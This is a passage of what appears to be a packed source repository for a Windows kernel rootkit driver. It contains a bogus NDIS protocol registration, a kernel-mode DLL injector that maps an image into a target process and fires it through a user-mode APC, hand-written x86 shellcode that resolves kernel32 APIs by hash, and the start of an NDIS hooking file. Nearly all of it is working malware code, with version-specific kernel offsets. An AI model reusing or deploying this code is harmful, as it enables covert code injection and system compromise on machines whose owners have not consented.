OnUnbindAdapter;\r\n    Protocol.Ndis40Chars.UnloadHandler = OnUnload;\r\n    Protocol.Ndis40Chars.ReceivePacketHandler = OnReceivePacket;\r\n    Protocol.Ndis40Chars.PnPEventHandler = OnPnPHandler;\r\n\r\n    NDIS_STRING ProtocolName;\r\n    NdisInitUnicodeString(&ProtocolName, L\"BogusProto\");\r\n    Protocol.Ndis40Chars.Name = ProtocolName;\r\n\r\n    // register our bogus protocol\r\n    
NdisRegisterProtocol(\r\n        &status, \r\n        &m_hBogusProtocol, \r\n        &Protocol, \r\n        sizeof(Protocol)\r\n    );\r\n    if (status != NDIS_STATUS_SUCCESS)\r\n    {\r\n        DbgMsg(\"NdisRegisterProtocol() fails; status: 0x%.8x\\n\", status);\r\n        return NULL;\r\n    }\r\n \r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"(): Protocol registered\\n\");\r\n\r\n#endif\r\n\r\n    return m_hBogusProtocol;    \r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid BogusProtocolUnregister(void)\r\n{\r\n    if (m_hBogusProtocol)\r\n    {\r\n        NDIS_STATUS status = STATUS_SUCCESS;\r\n        NdisDeregisterProtocol(&status, m_hBogusProtocol);\r\n        m_hBogusProtocol = NULL;\r\n    }    \r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n"
  },
  {
    "path": "src/rootkit_driver/bogusproto.h",
    "content": "\r\nNDIS_HANDLE BogusProtocolRegister(void);\r\nvoid BogusProtocolUnregister(void);\r\n"
  },
  {
    "path": "src/rootkit_driver/debug.h",
    "content": "\r\n#ifdef DBGMSG\r\n\r\n// debug messages are on\r\n#define DbgMsg DbgPrint\r\n\r\n#else\r\n\r\n#define DbgMsg\r\n\r\n#endif\r\n"
  },
  {
    "path": "src/rootkit_driver/dll_inject.cpp",
    "content": "#include \"stdafx.h\"\r\n#include \"dll_inject_shellcode.h\"\r\n\r\nULONG SDT_NtProtectVirtualMemory = 0;\r\nint m_KTHREAD_ApcState = -1;\r\n\r\nKEVENT m_ApcEvent;\r\n//--------------------------------------------------------------------------------------\r\n#ifdef _X86_\r\n\r\n__declspec(naked) NTSTATUS NTAPI _ZwProtectVirtualMemory(\r\n    HANDLE ProcessHandle,\r\n    PVOID *BaseAddress,\r\n    PSIZE_T NumberOfBytesToProtect,\r\n    ULONG NewAccessProtection,\r\n    PULONG OldAccessProtection)\r\n{\r\n    __asm\r\n    {\r\n        cmp     SDT_NtProtectVirtualMemory, 0\r\n        jz      _failed\r\n        mov     eax, SDT_NtProtectVirtualMemory\r\n        lea     edx, [esp + 4]\r\n        int     0x2e\r\n        retn    0x14\r\n\r\n_failed:\r\n        mov     eax, 0xc00000001\r\n        retn    0x14\r\n    }\r\n}\r\n\r\n#endif // _X86_\r\n//--------------------------------------------------------------------------------------\r\nULONG GetShellcodeSize(PVOID Data)\r\n{\r\n    ULONG Size = 0;\r\n    PULONG Ptr = (PULONG)Data;\r\n\r\n    // get size of shellcode\r\n    while (*Ptr != ENDM)\r\n    {\r\n        Size += 1;\r\n\r\n        // check for end marker\r\n        Ptr = (PULONG)((ULONG)Ptr + 1);        \r\n    }\r\n\r\n    return Size;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid InjectKernelApcRoutine(\r\n    struct _KAPC *Apc, \r\n    PKNORMAL_ROUTINE *NormalRoutine, \r\n    PVOID *NormalContext, \r\n    PVOID *SystemArgument1, \r\n    PVOID *SystemArgument2) \r\n{\r\n    DbgMsg(__FUNCTION__\"()\\n\");\r\n    KeSetEvent(&m_ApcEvent, 0, FALSE);\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN InjectFindProcess(PWSTR ProcessName, ULONG ProcessId, PKTHREAD *pThread, PEPROCESS *pProcess)\r\n{\r\n    BOOLEAN bRet = FALSE;\r\n    UNICODE_STRING usProcessName;\r\n\r\n    if (ProcessName)\r\n    {\r\n        
RtlInitUnicodeString(&usProcessName, ProcessName);\r\n    }    \r\n\r\n    *pThread = NULL;\r\n    *pProcess = NULL;\r\n\r\n    PSYSTEM_PROCESSES_INFORMATION pProcessesInfo = (PSYSTEM_PROCESSES_INFORMATION)\r\n        RuntimeGetSystemInformation(SystemProcessInformation);\r\n    if (pProcessesInfo)\r\n    {\r\n        PSYSTEM_PROCESSES_INFORMATION pInfo = pProcessesInfo;\r\n\r\n        // iterate processes list\r\n        while (pInfo)\r\n        {\r\n            if (pInfo->ProcessName.Buffer &&\r\n                pInfo->ThreadCount > 0)\r\n            {\r\n                // match by process name or ID\r\n                if ((ProcessName != NULL && RtlEqualUnicodeString(&pInfo->ProcessName, &usProcessName, TRUE)) ||\r\n                    (ProcessId != 0 && pInfo->ProcessId == ProcessId))\r\n                {\r\n                    DbgMsg(\r\n                        __FUNCTION__\"(): \\\"%wZ\\\", PID = %d\\n\", \r\n                        &pInfo->ProcessName, pInfo->ProcessId\r\n                    );\r\n\r\n                    NTSTATUS ns = PsLookupThreadByThreadId(\r\n                        pInfo->Threads[0].ClientId.UniqueThread, \r\n                        (PETHREAD *)pThread\r\n                    );\r\n                    if (!NT_SUCCESS(ns))\r\n                    {\r\n                        DbgMsg(\"PsLookupProcessByProcessId() ERROR; status: 0x%.8x\\n\", ns);\r\n                    }\r\n\r\n                    ns = PsLookupProcessByProcessId(\r\n                        (HANDLE)pInfo->ProcessId, \r\n                        pProcess\r\n                    );\r\n                    if (!NT_SUCCESS(ns))\r\n                    {\r\n                        DbgMsg(\"PsLookupProcessByProcessId() ERROR; status: 0x%.8x\\n\", ns);\r\n                    }\r\n\r\n                    if (*pThread && *pProcess)\r\n                    {\r\n                        bRet = TRUE;\r\n                        break;\r\n                    }\r\n                    else\r\n    
                {\r\n                        if (*pThread)\r\n                        {\r\n                            ObDereferenceObject(*pThread);\r\n                            *pThread = NULL;\r\n                        }\r\n\r\n                        if (*pProcess)\r\n                        {\r\n                            ObDereferenceObject(*pProcess);\r\n                            *pProcess = NULL;\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n\r\n            if (pInfo->NextEntryDelta == 0)\r\n            {\r\n                // end of the list\r\n                break;\r\n            }\r\n\r\n            pInfo = (PSYSTEM_PROCESSES_INFORMATION)((PUCHAR)pInfo + pInfo->NextEntryDelta);\r\n        }\r\n\r\n        ExFreePool(pProcessesInfo);\r\n    }\r\n\r\n    return bRet;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN ImjectMapDllImage(HANDLE hProcess, PVOID Data, ULONG DataSize, PVOID *pRetImage)\r\n{\r\n    PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)RVATOVA(\r\n        Data,\r\n        ((PIMAGE_DOS_HEADER)Data)->e_lfanew\r\n    );\r\n\r\n    PVOID Image = NULL;\r\n    ULONG ImageSize = pHeaders->OptionalHeader.SizeOfImage;\r\n\r\n    // allocate memory for image\r\n    NTSTATUS ns = ZwAllocateVirtualMemory(\r\n        hProcess,\r\n        (PVOID *)&Image,\r\n        0,\r\n        &ImageSize,\r\n        MEM_COMMIT | MEM_RESERVE,\r\n        PAGE_EXECUTE_READWRITE\r\n    );\r\n    if (NT_SUCCESS(ns))\r\n    {\r\n        DbgMsg(__FUNCTION__\"(): Memory for image allocated at \"IFMT\"\\n\", Image);\r\n\r\n        __try\r\n        {\r\n            // copy headers\r\n            RtlZeroMemory(Image, ImageSize);\r\n            RtlCopyMemory(Image, Data, pHeaders->OptionalHeader.SizeOfHeaders);\r\n\r\n            // copy sections\r\n            PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)\r\n                
((PUCHAR)&pHeaders->OptionalHeader + \r\n                pHeaders->FileHeader.SizeOfOptionalHeader);\r\n\r\n            for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)\r\n            {\r\n                RtlCopyMemory(\r\n                    RVATOVA(Image, pSection->VirtualAddress), \r\n                    RVATOVA(Data, pSection->PointerToRawData),\r\n                    min(pSection->SizeOfRawData, pSection->Misc.VirtualSize)\r\n                );\r\n\r\n                pSection++;\r\n            }            \r\n\r\n            // parse image base relocations\r\n            if (RuntimeProcessRelocs(Image, Image))\r\n            {\r\n                *pRetImage = Image;\r\n                return TRUE;\r\n            }\r\n        }\r\n        __except(EXCEPTION_EXECUTE_HANDLER)\r\n        {\r\n            DbgMsg(__FUNCTION__\"() EXCEPTION\\n\");\r\n        } \r\n\r\n        ZwFreeVirtualMemory(hProcess, &Image, 0, MEM_RELEASE);\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(\"ZwAllocateVirtualMemory() fails; status: 0x%.8x\\n\", ns);\r\n    }\r\n\r\n    return NULL;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN InjectIntoProcess(PEPROCESS Process, PKTHREAD Thread, PVOID Data, ULONG DataSize)\r\n{\r\n\r\n#ifdef USE_PARANOID_CHEKS\r\n\r\n    if (m_KTHREAD_ApcState < 0)\r\n    {\r\n        DbgMsg(__FUNCTION__\"() ERROR: Some offsets are not initialized\\n\");\r\n        return FALSE;\r\n    }\r\n\r\n#endif // USE_PARANOID_CHEKS\r\n\r\n    BOOLEAN bRet = FALSE;\r\n    HANDLE hProcess = NULL;\r\n\r\n    // get handle to the target process\r\n    NTSTATUS ns = ObOpenObjectByPointer(\r\n        Process,\r\n        OBJ_KERNEL_HANDLE,\r\n        NULL,\r\n        0,\r\n        NULL,\r\n        KernelMode,\r\n        &hProcess\r\n    );\r\n    if (NT_SUCCESS(ns))\r\n    {\r\n        PROCESS_BASIC_INFORMATION ProcessInfo;                               \r\n\r\n        // get address of PEB\r\n       
 ns = ZwQueryInformationProcess(\r\n            hProcess,\r\n            ProcessBasicInformation,\r\n            &ProcessInfo,\r\n            sizeof(ProcessInfo),\r\n            NULL\r\n        );\r\n        if (!NT_SUCCESS(ns))\r\n        {\r\n            DbgMsg(\"ZwQueryInformationProcess() fails; status: 0x%.8x\\n\", ns);\r\n            goto close;\r\n        }                       \r\n\r\n        // attach to the process address space\r\n        KAPC_STATE ApcState;\r\n        KeStackAttachProcess(Process, &ApcState);\r\n\r\n        // get process image base from peb\r\n        PVOID ProcessImageBase = *(PVOID *)((PUCHAR)ProcessInfo.PebBaseAddress + PEB_IMAGE_BASE_OFFEST);\r\n\r\n        // map DLL image into the target process\r\n        PVOID Image = NULL;\r\n        if (ImjectMapDllImage(hProcess, Data, DataSize, &Image))\r\n        {\r\n            __try\r\n            {\r\n                PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)RVATOVA(\r\n                    Image,\r\n                    ((PIMAGE_DOS_HEADER)Data)->e_lfanew\r\n                );\r\n\r\n                PVOID ImageEntryPoint = RVATOVA(Image, pHeaders->OptionalHeader.AddressOfEntryPoint);\r\n\r\n                DbgMsg(__FUNCTION__\"(): Image entry point is at \"IFMT\"\\n\", ImageEntryPoint);\r\n\r\n                PINJ_THREAD_STRUCT InjectStruct = NULL;\r\n                ULONG ShellCodeSize = GetShellcodeSize(inj_shellcode);\r\n                ULONG InjectStructSize = sizeof(INJ_THREAD_STRUCT) + ShellCodeSize;\r\n\r\n                // allocate memory for callgate\r\n                NTSTATUS ns = ZwAllocateVirtualMemory(\r\n                    hProcess,\r\n                    (PVOID *)&InjectStruct,\r\n                    0,\r\n                    &InjectStructSize,\r\n                    MEM_COMMIT | MEM_RESERVE,\r\n                    PAGE_EXECUTE_READWRITE\r\n                );\r\n                if (NT_SUCCESS(ns))\r\n                {\r\n                    DbgMsg(\"Callgate 
allocated at \"IFMT\"\\n\", InjectStruct);\r\n\r\n                    RtlFillMemory(InjectStruct, InjectStructSize, 0x90);\r\n\r\n                    #define DLL_PROCESS_ATTACH 0x01\r\n\r\n                    #define REL_OP(_to_, _from_)                                   \\\r\n                                                                                    \\\r\n                        (ULONG)((PUCHAR)&InjectStruct->##_to_ -                     \\\r\n                                (PUCHAR)&InjectStruct->##_from_) - sizeof(ULONG)\r\n\r\n#ifdef _X86_                        \r\n                    InjectStruct->u0_0x68 = 0x68; /* PUSH Image */\r\n                    InjectStruct->Image = (ULONG)Image;\r\n\r\n                    InjectStruct->u1_0xE8 = 0xE8; /* CALL ProcessModuleImports */\r\n                    InjectStruct->ShellCodeAddr = REL_OP(ShellCode, ShellCodeAddr);\r\n                    \r\n                    InjectStruct->u2_0xC085 = 0xC085; /* TEST EAX, EAX */\r\n\r\n                    InjectStruct->u3_0x840F = 0x840F; /* JZ Exit */\r\n                    InjectStruct->ExitAddr = REL_OP(u8_0xC2, ExitAddr);\r\n\r\n                    InjectStruct->u4_0x68 = 0x68; /* PUSH 0 */\r\n                    InjectStruct->param_Reserved = 0;\r\n                    \r\n                    InjectStruct->u5_0x68 = 0x68; /* PUSH DLL_PROCESS_ATTACH */\r\n                    InjectStruct->param_Reason = DLL_PROCESS_ATTACH;\r\n                    \r\n                    InjectStruct->u6_0x68 = 0x68; /* PUSH ModuleInstance */\r\n                    InjectStruct->ModuleInstance = (ULONG)Image;\r\n                    \r\n                    InjectStruct->u7_0xE8 = 0xe8; /* CALL ImageEntryPoint */\r\n                    InjectStruct->ImageEntryPoint = (ULONG)((PUCHAR)ImageEntryPoint - (PUCHAR)&InjectStruct->ImageEntryPoint) - sizeof(ULONG);\r\n                                          \r\n                    InjectStruct->u8_0xC2 = 0xc2; /* RET 3 */\r\n                    
InjectStruct->param_local_size = 3;\r\n#else // _X86_\r\n\r\n#error __FUNCTION__ is x86 only\r\n\r\n#endif // _X86_\r\n                    // copy shellcode, that processing module imports\r\n                    RtlCopyMemory(&InjectStruct->ShellCode, inj_shellcode, ShellCodeSize);                                                \r\n\r\n                    KAPC Apc;\r\n                    PKAPC_STATE pThreadApcState = (PKAPC_STATE)((PUCHAR)Thread + m_KTHREAD_ApcState);\r\n\r\n                    KeInitializeApc(\r\n                        &Apc, \r\n                        Thread, \r\n                        OriginalApcEnvironment, \r\n                        &InjectKernelApcRoutine, \r\n                        NULL, \r\n                        (PKNORMAL_ROUTINE)InjectStruct, \r\n                        UserMode, \r\n                        NULL\r\n                    );\r\n\r\n                    // enable user APC delivering\r\n                    pThreadApcState->UserApcPending = TRUE;\r\n\r\n                    // add routine to the APC queue\r\n                    if (KeInsertQueueApc(&Apc, NULL, NULL, 0))\r\n                    {\r\n                        LARGE_INTEGER Timeout;\r\n                        Timeout.QuadPart = TIME_RELATIVE(TIME_SECONDS(1));                \r\n\r\n                        // waiting for APC completion\r\n                        ns = KeWaitForSingleObject(&m_ApcEvent, Executive, KernelMode, FALSE, &Timeout);\r\n                        if (ns == STATUS_TIMEOUT)\r\n                        {\r\n                            DbgMsg(__FUNCTION__\"(): Error while delivering APC\\n\");\r\n                        }\r\n                        else if (NT_SUCCESS(ns))\r\n                        {\r\n                            DbgMsg(__FUNCTION__\"(): APC delivered!\\n\");\r\n                            bRet = TRUE;\r\n                        }\r\n\r\n                        // sleep for 1 sec.\r\n                        
KeDelayExecutionThread(KernelMode, FALSE, &Timeout);\r\n                    }\r\n                    else\r\n                    {\r\n                        DbgMsg(\"KeInsertQueueApc() ERROR\\n\");\r\n                    } \r\n                }\r\n                else\r\n                {\r\n                    DbgMsg(\"ZwAllocateVirtualMemory() fails; status: 0x%.8x\\n\", ns);\r\n                }\r\n            }\r\n            __except(EXCEPTION_EXECUTE_HANDLER)\r\n            {\r\n                DbgMsg(__FUNCTION__\"() EXCEPTION\\n\");\r\n            }              \r\n        }   \r\n\r\n        KeUnstackDetachProcess(&ApcState);\r\n\r\nclose:\r\n        ZwClose(hProcess);\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(\"ObOpenObjectByPointer() fails; status: 0x%.8x\\n\", ns);\r\n    }\r\n\r\n    return bRet;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN InjectIntoProcessByName(PWSTR ProcessName, PVOID Data, ULONG DataSize)\r\n{\r\n    BOOLEAN bRet = FALSE;\r\n    PEPROCESS Process = NULL;\r\n    PKTHREAD Thread = NULL;\r\n\r\n    // lookup for process by name\r\n    if (InjectFindProcess(ProcessName, 0, &Thread, &Process))\r\n    {\r\n        // perform DLL injection\r\n        bRet = InjectIntoProcess(Process, Thread, Data, DataSize);\r\n\r\n        ObDereferenceObject(Process);\r\n        ObDereferenceObject(Thread);\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(__FUNCTION__\"() ERROR: Unable to find process \\\"%ws\\\"\\n\", ProcessName);\r\n    }\r\n\r\n    return bRet;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN InjectIntoProcessById(ULONG ProcessId, PVOID Data, ULONG DataSize)\r\n{\r\n    BOOLEAN bRet = FALSE;\r\n    PEPROCESS Process = NULL;\r\n    PKTHREAD Thread = NULL;\r\n\r\n    // lookup for process by ID\r\n    if (InjectFindProcess(NULL, ProcessId, &Thread, &Process))\r\n    {\r\n        // perform DLL injection\r\n  
      bRet = InjectIntoProcess(Process, Thread, Data, DataSize);\r\n\r\n        ObDereferenceObject(Process);\r\n        ObDereferenceObject(Thread);\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(__FUNCTION__\"() ERROR: Unable to find process PID=%d\\n\", ProcessId);\r\n    }\r\n\r\n    return bRet;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN InjectInitialize(void)\r\n{    \r\n    RTL_OSVERSIONINFOEXW VersionInformation;\r\n    VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation);\r\n\r\n    if (!NT_SUCCESS(RtlGetVersion((PRTL_OSVERSIONINFOW)&VersionInformation)))\r\n    {\r\n        return FALSE;\r\n    }\r\n\r\n    if (VersionInformation.dwMajorVersion == 5 && \r\n        VersionInformation.dwMinorVersion == 1)\r\n    {\r\n        // XP\r\n        SDT_NtProtectVirtualMemory = 0x0089;\r\n\r\n#ifdef _X86_\r\n\r\n        m_KTHREAD_ApcState = 0x34;\r\n#endif\r\n\r\n    }\r\n    else if (\r\n        VersionInformation.dwMajorVersion == 5 && \r\n        VersionInformation.dwMinorVersion == 2)\r\n    {\r\n        // Server 2003\r\n        SDT_NtProtectVirtualMemory = 0x008f;\r\n\r\n#ifdef _X86_\r\n\r\n        m_KTHREAD_ApcState = 0x28;\r\n#endif\r\n        if (VersionInformation.wServicePackMajor == 0 &&\r\n            VersionInformation.wServicePackMinor == 0)\r\n        {\r\n            // Service Pack 0, special case\r\n#ifdef _X86_\r\n\r\n            m_KTHREAD_ApcState = 0x34;\r\n#endif\r\n        }\r\n    }\r\n    else if (\r\n        VersionInformation.dwMajorVersion == 6 && \r\n        VersionInformation.dwMinorVersion == 0)\r\n    {\r\n        // Vista\r\n        if (VersionInformation.wServicePackMajor == 0 &&\r\n            VersionInformation.wServicePackMinor == 0)\r\n        {\r\n            // Service Pack 0, special case\r\n            SDT_NtProtectVirtualMemory = 0x00cf;\r\n        }\r\n        else\r\n        {\r\n            SDT_NtProtectVirtualMemory = 0x00d2;\r\n        
}\r\n\r\n#ifdef _X86_\r\n\r\n        m_KTHREAD_ApcState = 0x38;\r\n#endif\r\n\r\n    }\r\n    else if (\r\n        VersionInformation.dwMajorVersion == 6 && \r\n        VersionInformation.dwMinorVersion == 1)\r\n    {\r\n        // 7\r\n        SDT_NtProtectVirtualMemory = 0x00d7;\r\n\r\n#ifdef _X86_\r\n\r\n        m_KTHREAD_ApcState = 0x40;\r\n#endif\r\n\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(__FUNCTION__\"() ERROR: Unknown NT version\\n\");\r\n        return FALSE;\r\n    }\r\n\r\n    DbgMsg(\"NtProtectVirtualMemory() SDT number is 0x%x\\n\", SDT_NtProtectVirtualMemory);   \r\n\r\n    KeInitializeEvent(&m_ApcEvent, SynchronizationEvent, FALSE);\r\n\r\n    return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n"
  },
  {
    "path": "src/rootkit_driver/dll_inject.h",
    "content": "\r\n\r\n#ifdef _X86_\r\n\r\n#define PEB_IMAGE_BASE_OFFEST 0x08\r\n\r\n#elif _AMD64_\r\n\r\n#define PEB_IMAGE_BASE_OFFEST 0x10\r\n\r\n#endif\r\n\r\n/**\r\n * Callgate for execution library with CreateRemoteThread()\r\n */\r\n#pragma pack(1)\r\ntypedef struct _INJ_THREAD_STRUCT\r\n{\r\n    // push ModuleBase\r\n    UCHAR   u0_0x68;\r\n    ULONG   Image;\r\n\r\n    // call ProcessModuleImports\r\n    UCHAR   u1_0xE8;\r\n    ULONG   ShellCodeAddr;\r\n    \r\n    // test eax,eax\r\n    USHORT  u2_0xC085;\r\n\r\n    // jz exit\r\n    USHORT  u3_0x840F;\r\n    ULONG   ExitAddr;\r\n\r\n    // push param_1\r\n    UCHAR   u4_0x68;\r\n    ULONG   param_Reserved;\r\n    \r\n    // push param_2\r\n    UCHAR   u5_0x68;\r\n    ULONG   param_Reason;\r\n    \r\n    // push param_3\r\n    UCHAR   u6_0x68;\r\n    ULONG   ModuleInstance;\r\n    \r\n    // call ImageEntryPoint\r\n    UCHAR   u7_0xE8;\r\n    ULONG   ImageEntryPoint;    \r\n\r\n    // retn 3\r\n    UCHAR   u8_0xC2;\r\n    USHORT  param_local_size;\r\n\r\n    UCHAR   ShellCode[];\r\n\r\n} INJ_THREAD_STRUCT,\r\n*PINJ_THREAD_STRUCT;\r\n#pragma pack()\r\n\r\nNTSTATUS NTAPI _ZwProtectVirtualMemory(\r\n    HANDLE ProcessHandle,\r\n    PVOID *BaseAddress,\r\n    PSIZE_T NumberOfBytesToProtect,\r\n    ULONG NewAccessProtection,\r\n    PULONG OldAccessProtection\r\n);\r\n\r\n\r\nBOOLEAN InjectInitialize(void);\r\nBOOLEAN InjectIntoProcess(PEPROCESS Process, PKTHREAD Thread, PVOID Data, ULONG DataSize);\r\nBOOLEAN InjectIntoProcessByName(PWSTR ProcessName, PVOID Data, ULONG DataSize);\r\nBOOLEAN InjectIntoProcessById(ULONG ProcessId, PVOID Data, ULONG DataSize);\r\n\r\n"
  },
  {
    "path": "src/rootkit_driver/dll_inject_shellcode.h",
    "content": "#define EMIT(_data_) __asm __emit _data_\r\n#define _ __asm __emit \r\n\r\n#define h_LoadLibraryA    0xA412FD89 \r\n#define h_GetProcAddress  0xF2509B84\r\n\r\n#define h_LoadLibraryExA  0x04BF60E8\r\n\r\n#define ENDM  'DNE~' \r\n\r\n/**\r\n* Shellcode for setting up library imports\r\n*/\r\n__declspec(naked) ULONG __stdcall inj_shellcode(PVOID Addr)\r\n{\r\n    ULONG fLoadLibraryA, fGetProcAddress, bRet;\r\n\r\n    __asm\r\n    {\r\n        push    ebp\r\n        mov     ebp, esp\r\n        sub     esp, __LOCAL_SIZE\r\n\r\n        pushad\r\n\r\n        call    _realloc\r\n\r\n_realloc:\r\n\r\n        // calculate shellcode address\r\n        pop     ebx\r\n        sub     ebx, _realloc        \r\n\r\n        call    _get_kernel_32\r\n        mov     esi, eax\r\n\r\n        push    h_LoadLibraryExA\r\n        push    esi\r\n        call    _get_proc_addr\r\n\r\n        // get address of KERNEL32.DLL\r\n        push    0\r\n        push    0\r\n        lea     ecx, [ebx + _kernel32_name]\r\n        push    ecx\r\n        call    eax\r\n        mov     esi, eax\r\n\r\n        push    h_LoadLibraryA\r\n        push    esi\r\n        call    _get_proc_addr\r\n        mov     fLoadLibraryA, eax \r\n\r\n        push    h_GetProcAddress\r\n        push    esi\r\n        call    _get_proc_addr\r\n        mov     fGetProcAddress, eax\r\n\r\n        push    fGetProcAddress\r\n        push    fLoadLibraryA\r\n        mov     eax, [ebp + 8]\r\n        push    eax\r\n        call    _process_imports\r\n        mov     bRet, eax\r\n\r\n        popad\r\n\r\n        mov     eax, bRet\r\n\r\n        mov     esp, ebp\r\n        pop     ebp\r\n        retn    0x04\r\n\r\n_calc_hash:\r\n        push    ebp\r\n        mov     ebp, esp\r\n        mov     eax, [ebp + 8]\r\n        push    edx\r\n        xor     edx, edx\r\n\r\n_calc_hash_next:\r\n        rol     edx, 3\r\n        xor     dl, [eax]\r\n        inc     eax\r\n        cmp     [eax], 0\r\n        jnz     
_calc_hash_next\r\n        mov     eax, edx\r\n        pop     edx\r\n        pop     ebp\r\n        retn    4\r\n\r\n_get_kernel_32:\r\n        push    esi\r\n        xor     eax, eax\r\n        mov     eax, fs:[0x30]\r\n        js      _find_kernel_9x\r\n        mov     eax, [eax + 0x0c]\r\n        mov     esi, [eax + 0x1c]\r\n        lodsd\r\n        mov     eax, [eax + 0x8]\r\n        jmp     _find_kernel_end\r\n\r\n_find_kernel_9x:\r\n        mov     eax, [eax + 0x34]\r\n        lea     eax, [eax + 0x7c]\r\n        mov     eax, [eax + 0x3c]\r\n\r\n_find_kernel_end:\r\n        pop     esi\r\n        ret\r\n\r\n_get_proc_addr:\r\n        push    ebp\r\n        mov     ebp, esp\r\n        push    ebx\r\n        push    esi\r\n        push    edi\r\n        xor     eax, eax\r\n        mov     ebx, [ebp + 0Ch]\r\n        mov     esi, [ebp + 8]\r\n        mov     edi, esi\r\n        add     esi, [esi + 3Ch]\r\n        mov     ecx, [esi + 78h]\r\n        add     ecx, edi\r\n        mov     edx, [ecx + 1ch]\r\n        push    edx\r\n        mov     edx, [ecx + 24h]\r\n        push    edx\r\n        mov     esi, [ecx + 20h]\r\n        add     esi, edi\r\n        cdq\r\n        dec     edx\r\n\r\n_next_func:     \r\n        lodsd\r\n        inc     edx\r\n        add     eax, [ebp + 8]\r\n        push    eax\r\n        call    _calc_hash\r\n        cmp     eax, ebx\r\n        jnz     _next_func\r\n        mov     eax, [ebp + 8]\r\n        xchg    eax, edx\r\n        pop     esi\r\n        add     esi, edx\r\n        shl     eax, 1\r\n        add     eax, esi\r\n        xor     ecx, ecx\r\n        movzx   ecx, word ptr [eax]\r\n        pop     edi\r\n        shl     ecx, 2\r\n        add     ecx, edx\r\n        add     ecx, edi\r\n        mov     eax, [ecx]\r\n        add     eax, edx\r\n        pop     edi\r\n        pop     esi\r\n        pop     ebx\r\n        pop     ebp\r\n        retn    8\r\n\r\n_process_imports:\r\n        push    ebp\r\n        mov     ebp, 
esp\r\n        sub     esp, 0x10\r\n        push    ebx\r\n        mov     ebx, [ebp + 8]\r\n        test    ebx, ebx\r\n        push    esi\r\n        push    edi\r\n        je      _l067\r\n        mov     eax, [ebx + 0x3c]\r\n        mov     edi, [eax + ebx + 0x80]\r\n        add     edi, ebx\r\n        jmp     _l058\r\n_l013:\r\n        mov     eax, [edi + 0xc]\r\n        add     eax, ebx\r\n        mov     [ebp - 4], eax\r\n        push    [ebp - 4]\r\n        call    [ebp + 0x0c]\r\n        mov     [ebp + 8], eax\r\n        cmp     dword ptr [ebp + 8], 0\r\n        je      _l067\r\n        cmp     dword ptr [edi + 4], -1\r\n        jnz     _l025\r\n        mov     eax, [edi]\r\n        jmp     _l026\r\n_l025:\r\n        mov     eax, [edi + 0x10]\r\n_l026:\r\n        mov     [ebp - 4], eax\r\n        lea     esi,[eax + ebx]\r\n        jmp     _l055\r\n_l029:\r\n        mov     eax, [esi]\r\n        test    eax, 0xf0000000\r\n        je      _l040\r\n        and     eax, 0x0ffff\r\n        mov     [ebp - 8], eax\r\n        push    [ebp - 8]\r\n        push    [ebp + 8]\r\n        call    [ebp + 0x10]\r\n        mov     [ebp - 0x0c], eax\r\n        mov     eax, [ebp - 0x0c]\r\n        jmp     _l047\r\n_l040:\r\n        lea     eax, [eax + ebx + 2]\r\n        mov     [ebp - 8], eax\r\n        push    [ebp - 8]\r\n        push    [ebp + 8]\r\n        call    [ebp + 0x10]\r\n        mov     [ebp - 0x10], eax\r\n        mov     eax, [ebp - 0x10]\r\n_l047:\r\n        test    eax, eax\r\n        mov     [esi], eax\r\n        je      _l067\r\n        mov     eax, [edi + 0x10]\r\n        sub     eax, [ebp - 4]\r\n        mov     ecx, [esi]\r\n        mov     [eax + esi], ecx\r\n        add     esi, 4\r\n_l055:\r\n        cmp     dword ptr [esi], 0\r\n        jnz     _l029\r\n        add     edi, 0x14\r\n_l058:\r\n        cmp     dword ptr [edi], 0\r\n        jnz     _l013\r\n        xor     eax, eax\r\n        inc     eax\r\n_l062:\r\n        pop     edi\r\n        pop  
   esi\r\n        pop     ebx\r\n        leave\r\n        retn    0x0c\r\n_l067:\r\n        xor     eax, eax\r\n        jmp     _l062\r\n\r\n_kernel32_name:\r\n\r\n        EMIT('k' _ 'e' _ 'r' _ 'n' _ 'e' _ 'l' _ '3' _ '2' _ 0)\r\n    }\r\n\r\n    // shellcode's end marker\r\n    EMIT('~' _ 'E' _ 'N' _ 'D') \r\n}\r\n"
  },
  {
    "path": "src/rootkit_driver/ndis_hook.cpp",
    "content": "#include \"stdafx.h\"\r\n\r\n// NDIS version: 6.0\r\n#define NDIS60 1\r\n\r\nextern \"C\"\r\n{\r\n#include <ndis.h>\r\n}\r\n\r\n\r\n#include \"bogusproto.h\"\r\n\r\n#pragma alloc_text(INIT, NdisHookProtocolFind)\r\n#pragma alloc_text(INIT, NdisHookProtocolEnumOpened)\r\n#pragma alloc_text(INIT, NdisHookOpenGetMiniport)\r\n#pragma alloc_text(INIT, NdisHookAllocJump)\r\n#pragma alloc_text(INIT, NdisHookSet)\r\n\r\n// field offsets for NDIS structures\r\nint NDIS_PROTOCOL_BLOCK_Name                            = -1,\r\n    NDIS_PROTOCOL_BLOCK_OpenQueue                       = -1,\r\n    NDIS_PROTOCOL_BLOCK_NextProtocol                    = -1,\r\n    NDIS_OPEN_BLOCK_ProtocolNextOpen                    = -1,        \r\n    NDIS_OPEN_BLOCK_MiniportHandle                      = -1,    \r\n    NDIS_MINIPORT_BLOCK_InterruptEx                     = -1,\r\n    NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler   = -1,\r\n    